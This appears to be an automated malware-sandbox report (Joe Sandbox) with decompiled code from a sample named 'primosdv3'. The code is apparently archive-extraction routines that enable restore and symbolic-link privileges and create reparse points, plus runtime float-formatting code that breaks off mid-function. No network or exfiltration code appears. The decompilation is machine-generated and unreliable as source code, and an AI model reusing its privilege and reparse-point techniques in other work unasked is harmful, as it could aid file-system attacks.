				signed int _t205;
				signed int _t229;
				intOrPtr* _t233;
				intOrPtr* _t234;
				void* _t236;
				intOrPtr _t237;
				signed int _t238;
				void* _t239;
				intOrPtr _t240;
				signed int _t242;
				intOrPtr _t244;
				short _t245;
				void* _t246;
				intOrPtr _t250;
				short _t252;
				void* _t253;
				void* _t255;
				void* _t256;

				E00C7EB78(_t98, _t253);
				E00C7EC50(0x30a8);
				if( *0xca1023 == 0) {
					E00C67A9C(L"SeRestorePrivilege");
					E00C67A9C(L"SeCreateSymbolicLinkPrivilege");
					 *0xca1023 = 1;
				}
				_t203 = _t253 - 0x2c;
				E00C613BA(_t203, 0x1418);
				_t244 =  *((intOrPtr*)(_t253 + 0x10));
				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
				E00C70602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
				 *(_t253 - 0x14) = E00C83E13(_t253 - 0x107c);
				_t236 = _t253 - 0x107c;
				_t199 = _t253 - 0x207c;
				_t109 = E00C86088(_t236, L"\\??\\", 4);
				_t256 = _t255 + 0x10;
				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
				 *(_t253 - 0xd) = _t204;
				if(_t109 == 0) {
					_t236 = _t253 - 0x1074;
				}
				if(_t204 != 0) {
					_t194 = E00C86088(_t236, L"UNC\\", 4);
					_t256 = _t256 + 0xc;
					if(_t194 == 0) {
						_t195 = 0x5c;
						 *((short*)(_t253 - 0x207c)) = _t195;
						_t199 = _t253 - 0x207a;
						_t236 = _t236 + 6;
					}
				}
				E00C86066(_t199, _t236);
				_t112 = E00C83E13(_t253 - 0x207c);
				_t237 =  *((intOrPtr*)(_t253 + 8));
				_t200 =  *(_t253 + 0xc);
				 *(_t253 - 0x18) = _t112;
				if( *((char*)(_t237 + 0x7197)) != 0) {
					L11:
					E00C6A0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
					if(E00C6A231(_t200) != 0) {
						_t186 = E00C6A28F(E00C6A243(_t200));
						_push(_t200);
						if(_t186 == 0) {
							E00C6A1E0();
						} else {
							E00C6A18F();
						}
					}
					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
						__eflags = CreateDirectoryW(_t200, 0);
						if(__eflags != 0) {
							goto L20;
						}
						_t201 = 0;
						E00C62021(__eflags, 0x14, 0, _t200);
						E00C66D83(0xca1098, 9);
						goto L41;
					} else {
						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 != 0xffffffff) {
							CloseHandle(_t182);
							L20:
							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
							__eflags = _t117 - 3;
							if(_t117 != 3) {
								__eflags = _t117 - 2;
								if(_t117 == 2) {
									L26:
									_t233 =  *(_t253 - 0x2c);
									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
									 *_t233 = 0xa000000c;
									_t245 = _t205 + _t205;
									 *((short*)(_t233 + 0xa)) = _t245;
									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
									 *((intOrPtr*)(_t233 + 6)) = 0;
									E00C86066(_t233 + 0x14, _t253 - 0x107c);
									_t246 =  *(_t253 - 0x2c);
									 *((short*)(_t246 + 0xc)) = _t245 + 2;
									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
									E00C86066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
									__eflags = _t134;
									 *(_t246 + 0x10) = _t134;
									L27:
									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
									__eflags = _t239 - 0xffffffff;
									if(_t239 != 0xffffffff) {
										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
										if(__eflags != 0) {
											E00C69556(_t253 - 0x30b4);
											 *(_t253 - 4) = 1;
											E00C67A7B(_t253 - 0x30b4, _t239);
											_t240 =  *((intOrPtr*)(_t253 + 8));
											_t247 =  *((intOrPtr*)(_t253 + 0x10));
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											E00C69DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
											E00C69620(_t253 - 0x30b4);
											__eflags =  *((char*)(_t240 + 0x71a8));
											if( *((char*)(_t240 + 0x71a8)) == 0) {
												E00C6A4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
											}
											_t201 = 1;
											E00C6959A(_t253 - 0x30b4);
											L41:
											E00C615FB(_t253 - 0x2c);
											 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
											return _t201;
										}
										CloseHandle(_t239);
										E00C62021(__eflags, 0x15, 0, _t200);
										_t154 = GetLastError();
										__eflags = _t154 - 5;
										if(_t154 == 5) {
											L32:
											__eflags = E00C707BC();
											if(__eflags == 0) {
												E00C615C6(_t253 - 0x7c, 0x18);
												E00C715FE(_t253 - 0x7c);
											}
											L34:
											E00C66DCB(0xca1098, __eflags);
											E00C66D83(0xca1098, 9);
											_t250 =  *((intOrPtr*)(_t253 + 0x10));
											_push(_t200);
											__eflags =  *((char*)(_t250 + 0x10f1));
											if( *((char*)(_t250 + 0x10f1)) == 0) {
												DeleteFileW();
											} else {
												RemoveDirectoryW();
											}
											L37:
											_t201 = 0;
											goto L41;
										}
										__eflags = _t154 - 0x522;
										if(__eflags != 0) {
											goto L34;
										}
										goto L32;
									}
									E00C66C23(_t200);
									E00C66D83(0xca1098, 9);
									goto L37;
								}
								__eflags = _t117 - 1;
								if(_t117 != 1) {
									goto L37;
								}
								goto L26;
							}
							_t234 =  *(_t253 - 0x2c);
							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
							 *_t234 = 0xa0000003;
							_t252 = _t229 + _t229;
							 *((short*)(_t234 + 0xa)) = _t252;
							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
							 *((intOrPtr*)(_t234 + 6)) = 0;
							E00C86066(_t234 + 0x10, _t253 - 0x107c);
							_t246 =  *(_t253 - 0x2c);
							 *((short*)(_t246 + 0xc)) = _t252 + 2;
							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
							E00C86066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
							goto L27;
						}
						E00C66C23(_t200);
						goto L37;
					}
				}
				if( *(_t253 - 0xd) != 0) {
					goto L37;
				}
				_t190 = E00C6BCC3(_t244 + 0x1104);
				_t269 = _t190;
				if(_t190 != 0) {
					goto L37;
				}
				_push(_t244 + 0x1104);
				_push(_t200);
				_push(_t244 + 0x28);
				_push(_t237);
				if(E00C67861(_t269) == 0) {
					goto L37;
				}
				goto L11;
			}

0x00c66faa
0x00c66fb4
0x00c66fc0
0x00c66fc7
0x00c66fd1
0x00c66fd6
0x00c66fd6
0x00c66fe5
0x00c66fe8
0x00c66fed
0x00c66ff0
0x00c67007
0x00c6701a
0x00c6701d
0x00c67025
0x00c67031
0x00c67036
0x00c6703b
0x00c6703e
0x00c67043
0x00c67045
0x00c67045
0x00c6704d
0x00c67057
0x00c6705c
0x00c67061
0x00c67065
0x00c67066
0x00c6706d
0x00c67073
0x00c67073
0x00c67061
0x00c67078
0x00c67084
0x00c67089
0x00c6708f
0x00c67092
0x00c6709c
0x00c670d6
0x00c670e1
0x00c670ee
0x00c670f7
0x00c670fc
0x00c670ff
0x00c67108
0x00c67101
0x00c67101
0x00c67101
0x00c670ff
0x00c67114
0x00c671e1
0x00c671e3
0x00000000
0x00000000
0x00c671ea
0x00c671ef
0x00c671fb
0x00000000
0x00c67127
0x00c67139
0x00c67142
0x00c67155
0x00c6715b
0x00c6715b
0x00c67161
0x00c67164
0x00c67205
0x00c67208
0x00c67213
0x00c67216
0x00c67219
0x00c6721f
0x00c67222
0x00c67228
0x00c6722b
0x00c67239
0x00c6723f
0x00c6724d
0x00c67255
0x00c67258
0x00c6725f
0x00c67274
0x00c67280
0x00c67280
0x00c67283
0x00c67286
0x00c6729e
0x00c672a0
0x00c672a3
0x00c672de
0x00c672e0
0x00c6735d
0x00c67369
0x00c6736d
0x00c67372
0x00c67375
0x00c67386
0x00c67399
0x00c673ac
0x00c673b7
0x00c673c2
0x00c673c7
0x00c673ce
0x00c673d4
0x00c673d4
0x00c673df
0x00c673e1
0x00c673e6
0x00c673e9
0x00c673f6
0x00c673fe
0x00c673fe
0x00c672e3
0x00c672ee
0x00c672f3
0x00c672f9
0x00c672fc
0x00c67305
0x00c6730a
0x00c6730c
0x00c67313
0x00c6731b
0x00c6731b
0x00c67320
0x00c67327
0x00c67330
0x00c67335
0x00c67338
0x00c67339
0x00c67340
0x00c6734a
0x00c67342
0x00c67342
0x00c67342
0x00c67350
0x00c67350
0x00000000
0x00c67350
0x00c672fe
0x00c67303
0x00000000
0x00000000
0x00000000
0x00c67303
0x00c672ad
0x00c672b6
0x00000000
0x00c672b6
0x00c6720a
0x00c6720d
0x00000000
0x00000000
0x00000000
0x00c6720d
0x00c6716d
0x00c67170
0x00c67176
0x00c67179
0x00c6717f
0x00c67182
0x00c67190
0x00c67196
0x00c671a4
0x00c671ac
0x00c671af
0x00c671b6
0x00c671cb
0x00000000
0x00c671d0
0x00c6714a
0x00000000
0x00c6714a
0x00c67114
0x00c670a2
0x00000000
0x00000000
0x00c670af
0x00c670b4
0x00c670b6
0x00000000
0x00000000
0x00c670c2
0x00c670c3
0x00c670c7
0x00c670c8
0x00c670d0
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00C66FAA
_wcslen.LIBCMT ref: 00C67013
_wcslen.LIBCMT ref: 00C67084

Part of subcall function 00C67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C67AAB
Part of subcall function 00C67A9C: GetLastError.KERNEL32 ref: 00C67AF1
Part of subcall function 00C67A9C: CloseHandle.KERNEL32(?), ref: 00C67B00

Part of subcall function 00C6A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641,000000FF), ref: 00C6A1F1
Part of subcall function 00C6A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641), ref: 00C6A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00C67139
CloseHandle.KERNEL32(00000000), ref: 00C67155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00C67298

Part of subcall function 00C69DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00C673BC,?,?,?,00000000), ref: 00C69DBC
Part of subcall function 00C69DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00C69E70

Part of subcall function 00C69620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00C695D6,?,?,?,?,?,00C92641,000000FF), ref: 00C6963B

Part of subcall function 00C6A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A501
Part of subcall function 00C6A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A532

Strings

UNC\, xrefs: 00C67051
SeRestorePrivilege, xrefs: 00C66FC2
SeCreateSymbolicLinkPrivilege, xrefs: 00C66FCC
\??\, xrefs: 00C6702B

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2821348736-3508440684
Opcode ID: b4acf3ed46ec848fd9990adcd6773a0d8007412f8607eb2447d53628fa01afd7
Instruction ID: fc8ac461c06c0fc13ff33b28a13929cf1394c3c75da10453d5885fc3cf20053b
Opcode Fuzzy Hash: b4acf3ed46ec848fd9990adcd6773a0d8007412f8607eb2447d53628fa01afd7
Instruction Fuzzy Hash: 2EC1F971904644AADB31DB74CCC5FEEB3ACAF04308F044A5AF95AE7282D734AB44DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00C8D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 68%

			E00C8D8EE(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				void* _t789;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void* _t1056;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				void* _t1080;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				signed int _t1151;
				signed int _t1152;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1161;
				signed int _t1162;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				unsigned int _t1168;
				void* _t1172;
				void* _t1173;
				unsigned int _t1174;
				signed int _t1179;
				signed int _t1180;
				signed int _t1182;
				signed int _t1183;
				intOrPtr* _t1185;
				signed int _t1186;
				void* _t1187;
				signed int _t1188;
				signed int _t1189;
				signed int _t1192;
				signed int _t1194;
				signed int _t1195;
				void* _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				void* _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int* _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				intOrPtr* _t1216;
				intOrPtr* _t1217;
				signed int _t1219;
				signed int _t1221;
				signed int _t1224;
				signed int _t1230;
				signed int _t1234;
				signed int _t1235;
				void* _t1236;
				signed int _t1240;
				signed int _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1261;
				signed int _t1262;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1271;
				signed int _t1273;
				signed int* _t1274;
				signed int* _t1277;
				signed int _t1286;

				_t1142 = __edx;
				_t1271 = _t1273;
				_t1274 = _t1273 - 0x964;
				_t743 =  *0xc9e7ac; // 0x2b9f4dac
				_v8 = _t743 ^ _t1271;
				_push(__ebx);
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1185 = _a16;
				_v1924 = _t1185;
				_v1920 = _t1055;
				E00C8D416( &_v1944, __eflags);
				_t1234 = _a8;
				_t748 = 0x2d;
				if((_t1234 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1185 = _t748;
				 *((intOrPtr*)(_t1185 + 8)) = _t1055;
				_t1186 = _a4;
				if((_t1234 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00C89994( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1186;
									_a8 = _t1234 & 0x7fffffff;
									_t1286 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1188 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1188 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1189 = _t1188 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1240 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1240;
									E00C8F460(_t1078, _t1286);
									_push(_t1078);
									 *_t1274 = _t1286;
									_t789 = E00C8F570();
									_t1080 = _t1078;
									_t790 = L00C923A0(_t789, _t1058, _t1080, _t1143);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1189;
									_v464 = _t1189;
									_t1061 = (0 | _t1189 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1240;
									if(_t1240 < 0) {
										__eflags = _t1240 - 0xfffffc02;
										if(_t1240 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00C8BDE1( &_v468, 0x1cc,  &_v1396, 0);
												_t1274 =  &(_t1274[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1258 = _t1109;
														_t1216 =  &_v468 + _t1109 * 4;
														_v1880 = _t1216;
														while(1) {
															__eflags = _t1258 - _t1061;
															if(_t1258 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1216;
															}
															_t210 = _t1258 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1168 = 0;
																__eflags = 0;
															} else {
																_t1168 =  *(_t1216 - 4);
															}
															_t1216 = _t1216 - 4;
															_t972 = _v1880;
															_t1258 = _t1258 - 1;
															 *_t972 = _t1168 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1258 - 0xffffffff;
															if(_t1258 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1240 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1192 = 1 - _t1240;
											E00C7FFF0(_t1192,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1271 + 0xbad63d) = 1 << (_t1192 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1172 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1271 + _t1172 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0))) {
														goto L101;
													}
													_t1172 = _t1172 + 4;
													__eflags = _t1172 - 8;
													if(_t1172 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1173 = 0;
															__eflags = 0;
														} else {
															_t1173 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1259 = _t1110;
														__eflags = _t975 - _t1173 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1217 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1173 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1259 - _t1061;
															if(_t1259 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1217;
															}
															_t175 = _t1259 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1174 = 0;
																__eflags = 0;
															} else {
																_t1174 =  *(_t1217 - 4);
															}
															_t1217 = _t1217 - 4;
															_t981 = _v1880;
															_t1259 = _t1259 - 1;
															 *_t981 = _t1174 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1259 - 0xffffffff;
															if(_t1259 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1219 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1261 = _t1219 << 2;
														E00C7FFF0(_t1219,  &_v1396, 0, _t1261);
														 *(_t1271 + _t1261 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1219 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E00C8BDE1( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1277 =  &(_t1274[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1262 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1262;
										__eflags = _t1061 - _t1262;
										if(_t1061 != _t1262) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1221 = _t992 >> 5;
											_v1872 = _t1221;
											_v1908 = _t1114 - _t993;
											_t996 = E00C7F0C0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1179 = _t1061 + _t1221;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1179;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1179 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1179 - 0x00000073 > 0x00000000;
											__eflags = _t1179 - 0x73;
											if(_t1179 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00C8BDE1( &_v468, 0x1cc,  &_v1396, 0);
												_t1274 =  &(_t1274[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1179 - _t1119;
													if(_t1179 >= _t1119) {
														_t1179 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1179;
													_v1880 = _t1012;
													__eflags = _t1179 - 0xffffffff;
													if(_t1179 != 0xffffffff) {
														_t1180 = _v1872;
														_t1264 = _t1179 - _t1180;
														__eflags = _t1264;
														_t1123 =  &_v468 + _t1264 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1180;
															if(_t1012 < _t1180) {
																break;
															}
															__eflags = _t1264 - _t1061;
															if(_t1264 >= _t1061) {
																_t1224 = 0;
																__eflags = 0;
															} else {
																_t1224 =  *_t1123;
															}
															__eflags = _t1264 - 1 - _t1061;
															if(_t1264 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
